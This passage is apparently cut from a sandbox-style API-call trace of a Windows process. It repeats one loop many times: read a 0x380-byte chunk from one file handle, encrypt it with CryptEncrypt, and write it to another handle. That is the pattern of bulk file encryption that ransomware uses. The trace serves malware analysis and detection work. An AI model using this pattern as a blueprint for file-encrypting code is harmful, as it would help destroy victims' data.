pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.686] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.686] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.687] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.687] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.687] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.687] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.687] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.687] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.688] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.689] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.689] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.689] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.689] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.689] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.689] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.689] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.689] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.690] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.690] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.690] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.690] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.690] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.691] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.691] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.691] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.691] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.691] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.691] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.692] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.692] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.692] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.692] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.692] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.692] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.693] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.693] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.693] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.693] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.693] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.694] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.694] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 